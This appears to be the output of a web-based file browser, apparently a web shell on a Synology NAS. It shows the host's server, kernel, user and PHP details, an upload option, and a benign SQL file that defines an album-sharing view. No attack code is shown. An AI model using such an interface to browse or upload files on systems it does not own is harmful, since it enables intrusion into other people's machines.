HEX
Server: Apache/2.4.63 (Unix)
System: Linux Synopilou92 4.4.302+ #72806 SMP Mon Jul 21 23:16:00 CST 2025 x86_64
User: pilou92 (1026)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /volume1/@appstore/SynologyPhotos/etc/sql/43.sql
CREATE OR REPLACE VIEW public.album_with_share_info_view
AS
SELECT
  album.id as id,
  album.id_user as id_user,
  album.name as name,
  album.type as type,
  album.create_time as create_time,
  album.start_time as start_time,
  share.privacy_type as privacy_type,
  share.enable as enable
FROM
  album LEFT JOIN share
ON album.passphrase_share = share.passphrase;